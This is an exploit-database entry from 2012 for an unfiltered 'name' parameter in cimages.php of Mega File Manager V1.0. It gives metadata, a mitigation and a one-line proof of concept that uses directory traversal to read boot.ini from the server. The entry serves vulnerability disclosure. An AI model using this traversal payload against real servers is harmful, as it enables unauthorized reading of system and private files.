header-logo
Suggest Exploit
vendor:
Mega File Manager
by:
i2sec-Min Gi Jo
3,3
CVSS
MEDIUM
FileDownload Vulnerability
20
CWE
Product Name: Mega File Manager
Affected Version From: V 1.0
Affected Version To: V 1.0
Patch Exists: NO
Related CWE: N/A
CPE: awesomephp.com/Download*5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

MegaFileManager FileDownload Vulnerability

There is no filtering on 'cimages.php' parameter 'name'.

Mitigation:

Filter the 'name' parameter of 'cimages.php'
Source

Exploit-DB raw data:

# Exploit Title: [MegaFileManager FileDownload Vulnerability

# date: 2012-04-19

# Author: i2sec-Min Gi Jo

# Software Link: http://www.awesomephp.com/?Download*5

# Version: Mega File Manager V 1.0

# Tested on: Windows




# Description : There is no filtering on 'cimages.php' parameter 'name'.


# PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini

Navigation

Suggest Exploit

Services By CQR